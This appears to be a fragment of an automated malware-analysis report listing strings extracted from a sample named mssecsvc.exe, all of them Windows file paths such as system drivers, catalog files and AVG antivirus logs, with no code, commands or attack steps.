                Source: mssecsvc.exe.2.dr | Binary string: K\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\netsstpt.inf_locBFFRp
                Source: mssecsvc.exe.2.dr | Binary string: ?\Device\HarddiskVolume2\Users\Public\Desktop\AVG Protection.lnk
                Source: mssecsvc.exe.2.dr | Binary string: c\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.dr | Binary string: {\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.dr | Binary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\parvdm.sys1
                Source: mssecsvc.exe.2.dr | Binary string: w\Device\HarddiskVolume2\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\Temporary Internet Files-1\
                Source: mssecsvc.exe.2.dr | Binary string: \Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Local\Avg\av16\temp\avg-2c059045-004a-4137-b301-6c3064f40275.tmpp
                Source: mssecsvc.exe.2.dr | Binary string: =\Device\HarddiskVolume2\Windows\System32\drivers\hcw85cir.sys
                Source: mssecsvc.exe.2.dr | Binary string: ;\Device\HarddiskVolume2\ProgramData\Microsoft\RAC\StateData
                Source: mssecsvc.exe.2.dr | Binary string: _\Device\HarddiskVolume2\$Recycle.Bin\S-1-5-21-1870734524-1274666089-2119431859-1000\desktop.ini
                Source: mssecsvc.exe.2.dr | Binary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Media-Foundation-Package~31bf3856ad364e35~x86~~6.1.7601.17514.catore.p
                Source: mssecsvc.exe.2.dr | Binary string: +\Device\HarddiskVolume2\Windows\System32\en_CPU
                Source: mssecsvc.exe.2.dr | Binary string: K\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.dr | Binary string: O\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\CompositeBus.inf_loc
                Source: mssecsvc.exe.2.dr | Binary string: H\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\input.inf_locH
                Source: mssecsvc.exe.2.dr | Binary string: O\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
                Source: mssecsvc.exe.2.dr | Binary string: +\Device\HarddiskVolume2\ProgramData\Avg\log
                Source: mssecsvc.exe.2.dr | Binary string: Q\Device\HarddiskVolume2\ProgramData\AVG Web TuneUp\ChromeExt\4.3.7.452\install.js
                Source: mssecsvc.exe.2.dr | Binary string: \Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Local\Avg\av16\temp\avg-2c059045-004a-4137-b301-6c3064f40275.tmpb
                Source: mssecsvc.exe.2.dr | Binary string: D\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows\Ras
                Source: mssecsvc.exe.2.dr | Binary string: J\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\ndiscap.inf_loctform.
                Source: mssecsvc.exe.2.dr | Binary string: \\Device\HarddiskVolume2\ProgramData\Microsoft\Windows\Start Menu\Programs\Remote Access Hoste`
                Source: mssecsvc.exe.2.dr | Binary string: :\Device\HarddiskVolume2\Windows\System32\drivers\ipnat.sys
                Source: mssecsvc.exe.2.dr | Binary string: 9\Device\HarddiskVolume2\Windows\System32\drivers\mpio.sys
                Source: mssecsvc.exe.2.dr | Binary string: F\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\cpu.inf_locCC
                Source: mssecsvc.exe.2.dr | Binary string: :\Device\HarddiskVolume2\Windows\System32\drivers\msdsm.sys
                Source: mssecsvc.exe.2.dr | Binary string: 0\Device\HarddiskVolume2\Windows\System32\ega.cpiA^p
                Source: mssecsvc.exe.2.dr | Binary string: c\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex,
                Source: mssecsvc.exe.2.dr | Binary string: <\Device\HarddiskVolume2\Windows\System32\drivers\ndiscap.sysS,
                Source: mssecsvc.exe.2.dr | Binary string: j\Device\HarddiskVolume2\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini
                Source: mssecsvc.exe.2.dr | Binary string: =\Device\HarddiskVolume2\Windows\System32\drivers\circlass.sys
                Source: mssecsvc.exe.2.dr | Binary string: <\Device\HarddiskVolume2\Windows\System32\drivers\lsi_sas.sysM
                Source: mssecsvc.exe.2.dr | Binary string: /\Device\HarddiskVolume2\Windows\ehome\ehrec.exe
                Source: mssecsvc.exe.2.dr | Binary string: n\Device\HarddiskVolume2\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini/
                Source: mssecsvc.exe.2.dr | Binary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Guest-Integration-Drivers-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
                Source: mssecsvc.exe.2.dr | Binary string: i\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows\RemoteApp and Desktop Connections Update
                Source: mssecsvc.exe.2.drBinary string: @\Device\HarddiskVolume2\Windows\Prefetch\DLLHOST.EXE-766398D2.pf_Tp
                Source: mssecsvc.exe.2.drBinary string: ^\Device\HarddiskVolume2\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Windows
                Source: mssecsvc.exe.2.drBinary string: v\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.drBinary string: 6\Device\HarddiskVolume2\Windows\System32\WinSATAPI.dllp
                Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\iscsiexe.dll
                Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\ProgramData\Avg\log\AV16\nslog.cfgS
                Source: mssecsvc.exe.2.drBinary string: ?\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\msdsm.sysS1
                Source: mssecsvc.exe.2.drBinary string: I\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\lltdio.inf_loc
                Source: mssecsvc.exe.2.drBinary string: G\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\acpi.inf_loc
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientExtensions-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
                Source: mssecsvc.exe.2.drBinary string: ,\Device\HarddiskVolume2\Windows\Temp\_avast_p
                Source: mssecsvc.exe.2.drBinary string: I\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows Defender
                Source: mssecsvc.exe.2.drBinary string: 0\Device\HarddiskVolume2\Windows\inf\netsstpt.PNFwnp
                Source: mssecsvc.exe.2.drBinary string: O\Device\HarddiskVolume2\Windows\Temp\avg_a01924\avg-secure-search-installer.exe2
                Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Windows\System32\termsrv.dll
                Source: mssecsvc.exe.2.drBinary string: H\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\mshdc.inf_loc
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-LanguagePack-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.cat
                Source: mssecsvc.exe.2.drBinary string: 7\Device\HarddiskVolume2\Windows\System32\sdiagnhost.exe
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\WUDFRd.sys
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Backup-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-CodecPack-Basic-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
                Source: mssecsvc.exe.2.drBinary string: 2\Device\HarddiskVolume2\Windows\System32\Tasks\WPD
                Source: mssecsvc.exe.2.drBinary string: /\Device\HarddiskVolume2\Program Files\AVG\UiDll@
                Source: mssecsvc.exe.2.drBinary string: S\Device\HarddiskVolume2\Windows\System32\config\systemprofile\Favorites\desktop.ini
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Local\Avg\av16\temp\avg-7e9df016-cbcc-4646-838e-02461299762d.tmp
                Source: mssecsvc.exe.2.drBinary string: J\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\msmouse.inf_loc
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\ProgramData\Avg\log\AV16\publog.cfgk
                Source: mssecsvc.exe.2.drBinary string: V\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\MSS.chkH
                Source: mssecsvc.exe.2.drBinary string: 2\Device\HarddiskVolume2\Windows\ehome\mcupdate.exe
                Source: mssecsvc.exe.2.drBinary string: H\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\cdrom.inf_loc
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\winsxs\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_ru-ru_a13dea73a92ad990\comctl32.dll.muiME
                Source: mssecsvc.exe.2.drBinary string: 8\Device\HarddiskVolume2\Windows\System32\drivers\smb.sysH
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\ProgramData\Avg\log\AV16\schedlog.cfgp
                Source: mssecsvc.exe.2.drBinary string: a\Device\HarddiskVolume2\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.inip
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\adpahci.sysp
                Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\gpprnext.dll
                Source: mssecsvc.exe.2.drBinary string: 7\Device\HarddiskVolume2\Program Files\AVG\Av\avg_us.lngp
                Source: mssecsvc.exe.2.drBinary string: G\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\disk.inf_loc
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\adpahci.sys
                Source: mssecsvc.exe.2.drBinary string: /\Device\HarddiskVolume2\Windows\inf\ndisuio.PNFT`
                Source: mssecsvc.exe.2.drBinary string: j\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Local\Avg\log\av16\avgidpagent.log.1
                Source: mssecsvc.exe.2.drBinary string: q\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Contentp
                Source: mssecsvc.exe.2.drBinary string: /\Device\HarddiskVolume2\Windows\winsxs\FileMapsp
                Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\wbem\WmiPrvSE.exe
                Source: mssecsvc.exe.2.drBinary string: m\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.drBinary string: E\Device\HarddiskVolume2\Windows\System32\drivers\ru-RU\fvevol.sys.muip
                Source: mssecsvc.exe.2.drBinary string: x\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.001H
                Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\wbengine.exe&
                Source: mssecsvc.exe.2.drBinary string: h\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Local\Avg\log\av16\fixcfg.log.lockp
                Source: mssecsvc.exe.2.drBinary string: 0\Device\HarddiskVolume2\Windows\inf\usbvideo.PNF
                Source: mssecsvc.exe.2.drBinary string: 7\Device\HarddiskVolume2\Program Files\AVG\Av\avg_ru.lng>"
                Source: mssecsvc.exe.2.drBinary string: .\Device\HarddiskVolume2\Windows\inf\wfplwf.PNF
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\cmdide.sysh
                Source: mssecsvc.exe.2.drBinary string: 2\Device\HarddiskVolume2\Windows\Performance\WinSAT
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\nfrd960.sys
                Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Windows\System32\WebClnt.dllG
                Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Windows\System32\fdPHost.dll
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\bthmodem.sys
                Source: mssecsvc.exe.2.drBinary string: H\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\cdrom.inf_locp
                Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Program Files\AVG\UiDll\2623
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Backup-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.cat
                Source: mssecsvc.exe.2.drBinary string: z\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\SystemIndex.236.gthr
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\HpSAMD.sys01CP
                Source: mssecsvc.exe.2.drBinary string: f\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-CoreClientUAUE-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.cat
                Source: mssecsvc.exe.2.drBinary string: k\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\megasas.sysPD
                Source: mssecsvc.exe.2.drBinary string: K\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\blbdrive.inf_loc
                Source: mssecsvc.exe.2.drBinary string: @\Device\HarddiskVolume2\Windows\System32\appidcertstorecheck.exezI
                Source: mssecsvc.exe.2.drBinary string: +\Device\HarddiskVolume2\Windows\System32\en{STSp
                Source: mssecsvc.exe.2.drBinary string: K\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\blbdrive.inf_locH
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\vsmraid.sysp
                Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Windows\System32\rasmans.dll
                Source: mssecsvc.exe.2.drBinary string: 3\Device\HarddiskVolume2\Windows\System32\usbmon.dll
                Source: mssecsvc.exe.2.drBinary string: K\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\netnwifi.inf_locPCF
                Source: mssecsvc.exe.2.drBinary string: r\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs1
                Source: mssecsvc.exe.2.drBinary string: X\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows\Windows Error ReportingPU
                Source: mssecsvc.exe.2.drBinary string: /\Device\HarddiskVolume2\Windows\Temp\avg_a04392p
                Source: mssecsvc.exe.2.drBinary string: c\Device\HarddiskVolume2\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibilityum
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\sffp_sd.sys
                Source: mssecsvc.exe.2.drBinary string: ,\Device\HarddiskVolume2\Windows\inf\disk.PNFH
                Source: mssecsvc.exe.2.drBinary string: T\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Local\Avg\av16p
                Source: mssecsvc.exe.2.drBinary string: 2\Device\HarddiskVolume2\Windows\System32\msdtc.exe}SDTL
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\mrxdav.sys
                Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\aelupsvc.dll
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010002.dirp
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010001.ciT
                Source: mssecsvc.exe.2.drBinary string: L\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework\v2.0.50727\dfsvc.exe
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\tssecsrv.sys
                Source: mssecsvc.exe.2.drBinary string: A\Device\HarddiskVolume2\Windows\System32\Speech\SpeechUX\sapi.cpl
                Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\modem.sysTEMPb
                Source: mssecsvc.exe.2.drBinary string: L\Device\HarddiskVolume2\Windows\ServiceProfiles\LocalService\AppData\Roaming\/
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\vms3cap.sysST
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\wacompen.sysp
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\sbp2port.sys
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\cmdide.sysLNKH
                Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\FntCache.dll
                Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\tdtcp.sys
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\nvraid.sys
                Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\msdtckrm.dll
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\amdsata.sys
                Source: mssecsvc.exe.2.drBinary string: x\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.000H
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Program Files\AVG\Setup\avgsetupx.exep
                Source: mssecsvc.exe.2.drBinary string: D\Device\HarddiskVolume2\Windows\System32\drivers\ru-RU\amdk8.sys.muiL
                Source: mssecsvc.exe.2.drBinary string: +\Device\HarddiskVolume2\Windows\System32\ru{PDC
                Source: mssecsvc.exe.2.drBinary string: g\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Roaming\AVG\AV\cfgall\fixcfg.lockH8H
                Source: mssecsvc.exe.2.drBinary string: 8\Device\HarddiskVolume2\Windows\System32\NlsData0019.dllp
                Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Users\Public\Documents\desktop.ini
                Source: mssecsvc.exe.2.drBinary string: Q\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Roaming\AVG
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\bxvbdx.sys
                Source: mssecsvc.exe.2.drBinary string: 3\Device\HarddiskVolume2\Windows\System32\mprdim.dll
                Source: mssecsvc.exe.2.drBinary string: r\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\CTLsp
                Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\auditcse.dll
                Source: mssecsvc.exe.2.drBinary string: 3\Device\HarddiskVolume2\Windows\System32\tbssvc.dllSTE
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\wacompen.sys
                Source: mssecsvc.exe.2.drBinary string: F\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\usb.inf_locp
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\NV_AGP.SYSH
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Common-Modem-Drivers-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.catH
                Source: mssecsvc.exe.2.drBinary string: I\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\lltdio.inf_locp
                Source: mssecsvc.exe.2.drBinary string: 7\Device\HarddiskVolume2\Windows\System32\drivers\wd.sys
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\SISAGP.SYS
                Source: mssecsvc.exe.2.drBinary string: 2\Device\HarddiskVolume2\Windows\Fonts\segoeuii.ttfp
                Source: mssecsvc.exe.2.drBinary string: M\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows\Task Manager
                Source: mssecsvc.exe.2.drBinary string: ,\Device\HarddiskVolume2\Windows\inf\oem2.PNFp
                Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\DriverStore\en-USC
                Source: mssecsvc.exe.2.drBinary string: 3\Device\HarddiskVolume2\Windows\System32\wecsvc.dll
                Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\modem.sysCu|
                Source: mssecsvc.exe.2.drBinary string: 3\Device\HarddiskVolume2\Windows\System32\TabSvc.dll
                Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Windows\System32\advpack.dll
                Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\blackbox.dll
                Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\ncobjapi.dllp
                Source: mssecsvc.exe.2.drBinary string: ,\Device\HarddiskVolume2\Windows\inf\oem9.PNF;
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\ProgramData\Avg\log\AV16\history.xml
                Source: mssecsvc.exe.2.drBinary string: A\Device\HarddiskVolume2\ProgramData\Avg\AV\Chjw\avgpsi.db-journal
                Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\msdsm.sysh
                Source: mssecsvc.exe.2.drBinary string: 6\Device\HarddiskVolume2\Windows\System32\sqlceqp30.dll
                Source: mssecsvc.exe.2.drBinary string: /\Device\HarddiskVolume2\Windows\inf\netserv.PNFTMP8p
                Source: mssecsvc.exe.2.drBinary string: 1\Device\HarddiskVolume2\Windows\ehome\ehsched.exe
                Source: mssecsvc.exe.2.drBinary string: J\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\netserv.inf_loc\ra
                Source: mssecsvc.exe.2.drBinary string: x\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.002
                Source: mssecsvc.exe.2.drBinary string: /\Device\HarddiskVolume2\Windows\inf\volsnap.PNFR07
                Source: mssecsvc.exe.2.drBinary string: `\Device\HarddiskVolume2\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows~p
                Source: mssecsvc.exe.2.drBinary string: F\Device\HarddiskVolume2\Windows\System32\drivers\ru-RU\volmgrx.sys.muip
                Source: mssecsvc.exe.2.drBinary string: C\Device\HarddiskVolume2\Program Files\AVG\UiDll\2623\icudtl.dat.zfsp
                Source: mssecsvc.exe.2.drBinary string: @\Device\HarddiskVolume2\Program Files\Windows Defender\MpSvc.dll
                Source: mssecsvc.exe.2.drBinary string: K\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\netsstpt.inf_loc
                Source: mssecsvc.exe.2.drBinary string: E\Device\HarddiskVolume2\Windows\System32\drivers\ru-RU\AMDAGP.SYS.mui
                Source: mssecsvc.exe.2.drBinary string: X\Device\HarddiskVolume2\Windows\System32\catroot2\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}t$p
                Source: mssecsvc.exe.2.drBinary string: e\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.drBinary string: E\Device\HarddiskVolume2\Windows\System32\drivers\rdpvideominiport.sys
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\qwavedrv.sys
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\VMBusHID.sys
                Source: mssecsvc.exe.2.drBinary string: 8\Device\HarddiskVolume2\Windows\System32\drivers\arc.sys
                Source: mssecsvc.exe.2.drBinary string: s\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFilesp
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\asyncmac.sys
                Source: mssecsvc.exe.2.drBinary string: g\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Roaming\AVG\AV\cfgall\fixcfg.lockc
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\wmiacpi.sys
                Source: mssecsvc.exe.2.drBinary string: E\Device\HarddiskVolume2\ProgramData\Microsoft\Network\Connections\Pbk
                Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\AtBroker.exe
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-CodecPack-Basic-Encoder-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
                Source: mssecsvc.exe.2.drBinary string: c\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Local\Avg\log\av16\avgemc.log
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\0001000F.diroV
                Source: mssecsvc.exe.2.drBinary string: O\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe5E
                Source: mssecsvc.exe.2.drBinary string: N\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows\SystemRestore
                Source: mssecsvc.exe.2.drBinary string: F\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\hal.inf_loc
                Source: mssecsvc.exe.2.drBinary string: >\Device\HarddiskVolume2\Windows\System32\drivers\mshidkmdf.sysA
                Source: mssecsvc.exe.2.drBinary string: B\Device\HarddiskVolume2\Windows\System32\LocationNotifications.exe\/
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GPUPipeline-Package~31bf3856ad364e35~x86~~6.1.7601.17514.catH
                Source: mssecsvc.exe.2.drBinary string: #\Device\HarddiskVolume2\Windows\infS
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\mrxdav.sysD
                Source: mssecsvc.exe.2.drBinary string: >\Device\HarddiskVolume2\Windows\Prefetch\AVGUI.EXE-77A07B37.pfU0_PPCp
                Source: mssecsvc.exe.2.drBinary string: q\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\BrSerWdm.sys
                Source: mssecsvc.exe.2.drBinary string: z\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates
                Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\AxInstSv.dll
                Source: mssecsvc.exe.2.drBinary string: g\Device\HarddiskVolume2\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host
                Source: mssecsvc.exe.2.drBinary string: >\Device\HarddiskVolume2\Windows\servicing\TrustedInstaller.exeAP7PDC
                Source: mssecsvc.exe.2.drBinary string: k\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
                Source: mssecsvc.exe.2.drBinary string: 2\Device\HarddiskVolume2\Windows\System32\VSSVC.exeSU
                Source: mssecsvc.exe.2.drBinary string: h\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Local\Avg\log\av16\avgidpdrv.log.2H
                Source: mssecsvc.exe.2.drBinary string: F\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\cpu.inf_loc
                Source: mssecsvc.exe.2.drBinary string: 1\Device\HarddiskVolume2\Windows\System32\pots.dllp
                Source: mssecsvc.exe.2.drBinary string: z\Device\HarddiskVolume2\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat
                Source: mssecsvc.exe.2.drBinary string: G\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.drBinary string: \\Device\HarddiskVolume2\Windows\System32\ru-RU\microsoft-windows-kernel-power-events.dll.mui
                Source: mssecsvc.exe.2.drBinary string: t\Device\HarddiskVolume2\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.inim
                Source: mssecsvc.exe.2.drBinary string: k\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exeta
